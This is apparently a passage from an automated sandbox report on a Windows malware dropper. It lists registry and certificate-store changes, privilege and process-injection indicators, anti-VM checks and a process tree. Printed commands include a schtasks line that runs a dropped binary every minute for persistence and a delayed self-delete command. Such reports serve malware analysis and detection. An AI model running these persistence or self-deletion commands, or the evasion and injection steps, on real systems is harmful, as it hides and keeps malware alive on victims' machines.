value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C40C2B86-73A5-46CC-8227-93FE57D006A6}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EE206A6E-7FF8-4A84-BD34-0C651E118BB5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe -
Processes:
j8F8cQWmBXz0EcdH8M6kRmwS.exekeks.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j8F8cQWmBXz0EcdH8M6kRmwS.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j8F8cQWmBXz0EcdH8M6kRmwS.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 j8F8cQWmBXz0EcdH8M6kRmwS.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 3560 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exechrosha.exerundll32.exetrf.exepowershell.exekeks.exejok.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerun.exeFur6VRjhskC9mU3vFPxSIc2H.exeiysAcluMQcM8JDfAwR0llgs6.exemstc.exepowershell.exepowershell.exepid process 1380 c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe 1380 c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe 1072 chrosha.exe 1072 chrosha.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 804 trf.exe 804 trf.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 1808 rundll32.exe 1972 powershell.exe 1972 powershell.exe 1348 keks.exe 1348 keks.exe 1348 keks.exe 1348 keks.exe 1972 powershell.exe 572 jok.exe 572 jok.exe 572 jok.exe 572 jok.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 1348 keks.exe 1348 keks.exe 952 powershell.exe 952 powershell.exe 952 powershell.exe 3468 powershell.exe 3468 powershell.exe 3368 powershell.exe 3368 powershell.exe 3468 powershell.exe 3368 powershell.exe 4908 powershell.exe 4908 powershell.exe 4908 powershell.exe 1628 powershell.exe 1628 powershell.exe 1272 run.exe 1628 powershell.exe 1272 run.exe 1272 run.exe 572 jok.exe 572 jok.exe 3672 Fur6VRjhskC9mU3vFPxSIc2H.exe 3672 Fur6VRjhskC9mU3vFPxSIc2H.exe 836 iysAcluMQcM8JDfAwR0llgs6.exe 836 iysAcluMQcM8JDfAwR0llgs6.exe 3560 mstc.exe 3560 mstc.exe 488 powershell.exe 488 powershell.exe 3540 powershell.exe 3540 powershell.exe 488 powershell.exe 3540 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 1272 run.exe 2228 cmd.exe 2228 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
trf.exemstc.exemsbuild.exepowershell.exepowershell.exekeks.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exejok.exeFur6VRjhskC9mU3vFPxSIc2H.exeiysAcluMQcM8JDfAwR0llgs6.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 804 trf.exe Token: SeBackupPrivilege 804 trf.exe Token: SeSecurityPrivilege 804 trf.exe Token: SeSecurityPrivilege 804 trf.exe Token: SeSecurityPrivilege 804 trf.exe Token: SeSecurityPrivilege 804 trf.exe Token: SeDebugPrivilege 3560 mstc.exe Token: SeDebugPrivilege 4472 msbuild.exe Token: SeDebugPrivilege 1972 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 1348 keks.exe Token: SeDebugPrivilege 3712 RegAsm.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 3368 powershell.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 572 jok.exe Token: SeDebugPrivilege 3672 Fur6VRjhskC9mU3vFPxSIc2H.exe Token: SeImpersonatePrivilege 3672 Fur6VRjhskC9mU3vFPxSIc2H.exe Token: SeDebugPrivilege 836 iysAcluMQcM8JDfAwR0llgs6.exe Token: SeImpersonatePrivilege 836 iysAcluMQcM8JDfAwR0llgs6.exe Token: SeDebugPrivilege 3560 mstc.exe Token: SeDebugPrivilege 488 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 5536 powershell.exe Token: SeDebugPrivilege 5900 powershell.exe Token: SeIncreaseQuotaPrivilege 5272 WMIC.exe Token: SeSecurityPrivilege 5272 WMIC.exe Token: SeTakeOwnershipPrivilege 5272 WMIC.exe Token: SeLoadDriverPrivilege 5272 WMIC.exe Token: SeSystemProfilePrivilege 5272 WMIC.exe Token: SeSystemtimePrivilege 5272 WMIC.exe Token: SeProfSingleProcessPrivilege 5272 WMIC.exe Token: SeIncBasePriorityPrivilege 5272 WMIC.exe Token: SeCreatePagefilePrivilege 5272 WMIC.exe Token: SeBackupPrivilege 5272 WMIC.exe Token: SeRestorePrivilege 5272 WMIC.exe Token: SeShutdownPrivilege 5272 WMIC.exe Token: SeDebugPrivilege 5272 WMIC.exe Token: SeSystemEnvironmentPrivilege 5272 WMIC.exe Token: SeRemoteShutdownPrivilege 5272 WMIC.exe Token: SeUndockPrivilege 5272 WMIC.exe Token: SeManageVolumePrivilege 5272 WMIC.exe Token: 33 5272 WMIC.exe Token: 34 5272 WMIC.exe Token: 35 5272 WMIC.exe Token: 36 5272 WMIC.exe Token: SeIncreaseQuotaPrivilege 5272 WMIC.exe Token: SeSecurityPrivilege 5272 WMIC.exe Token: SeTakeOwnershipPrivilege 5272 WMIC.exe Token: SeLoadDriverPrivilege 5272 WMIC.exe Token: SeSystemProfilePrivilege 5272 WMIC.exe Token: SeSystemtimePrivilege 5272 WMIC.exe Token: SeProfSingleProcessPrivilege 5272 WMIC.exe Token: SeIncBasePriorityPrivilege 5272 WMIC.exe Token: SeCreatePagefilePrivilege 5272 WMIC.exe Token: SeBackupPrivilege 5272 WMIC.exe Token: SeRestorePrivilege 5272 WMIC.exe Token: SeShutdownPrivilege 5272 WMIC.exe Token: SeDebugPrivilege 5272 WMIC.exe Token: SeSystemEnvironmentPrivilege 5272 WMIC.exe Token: SeRemoteShutdownPrivilege 5272 WMIC.exe Token: SeUndockPrivilege 5272 WMIC.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
u2zg.3.exepid process 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u2zg.3.exepid process 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe 4480 u2zg.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exemstc.exepid process 1272 run.exe 1272 run.exe 3560 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exeRegAsm.exegold.exeNewB.exeswiiii.exedescription pid process target process PID 1072 wrote to memory of 2016 1072 chrosha.exe swiiiii.exe PID 1072 wrote to memory of 2016 1072 chrosha.exe swiiiii.exe PID 1072 wrote to memory of 2016 1072 chrosha.exe swiiiii.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 2016 wrote to memory of 4848 2016 swiiiii.exe RegAsm.exe PID 1072 wrote to memory of 2992 1072 chrosha.exe alexxxxxxxx.exe PID 1072 wrote to memory of 2992 1072 chrosha.exe alexxxxxxxx.exe PID 1072 wrote to memory of 2992 1072 chrosha.exe alexxxxxxxx.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 2992 wrote to memory of 3712 2992 alexxxxxxxx.exe RegAsm.exe PID 3712 wrote to memory of 1348 3712 RegAsm.exe keks.exe PID 3712 wrote to memory of 1348 3712 RegAsm.exe keks.exe PID 3712 wrote to memory of 1348 3712 RegAsm.exe keks.exe PID 3712 wrote to memory of 804 3712 RegAsm.exe trf.exe PID 3712 wrote to memory of 804 3712 RegAsm.exe trf.exe PID 1072 wrote to memory of 2528 1072 chrosha.exe gold.exe PID 1072 wrote to memory of 2528 1072 chrosha.exe gold.exe PID 1072 wrote to memory of 2528 1072 chrosha.exe gold.exe PID 2528 wrote to memory of 4036 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 4036 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 4036 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3920 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3920 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3920 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3816 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3816 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 3816 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 2528 wrote to memory of 1492 2528 gold.exe RegAsm.exe PID 1072 wrote to memory of 4656 1072 chrosha.exe NewB.exe PID 1072 wrote to memory of 4656 1072 chrosha.exe NewB.exe PID 1072 wrote to memory of 4656 1072 chrosha.exe NewB.exe PID 4656 wrote to memory of 3444 4656 NewB.exe schtasks.exe PID 4656 wrote to memory of 3444 4656 NewB.exe schtasks.exe PID 4656 wrote to memory of 3444 4656 NewB.exe schtasks.exe PID 1072 wrote to memory of 572 1072 chrosha.exe jok.exe PID 1072 wrote to memory of 572 1072 chrosha.exe jok.exe PID 1072 wrote to memory of 572 1072 chrosha.exe jok.exe PID 1072 wrote to memory of 4564 1072 chrosha.exe swiiii.exe PID 1072 wrote to memory of 4564 1072 chrosha.exe swiiii.exe PID 1072 wrote to memory of 4564 1072 chrosha.exe swiiii.exe PID 4564 wrote to memory of 3564 4564 swiiii.exe RegAsm.exe PID 4564 wrote to memory of 3564 4564 swiiii.exe RegAsm.exe PID 4564 wrote to memory of 3564 4564 swiiii.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe"C:\Users\Admin\AppData\Local\Temp\c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 8843⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 3923⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 4123⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 13444⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Cjwclzs0EungII7uFfbPEY2H.exe"C:\Users\Admin\Pictures\Cjwclzs0EungII7uFfbPEY2H.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\u2zg.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2zg.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
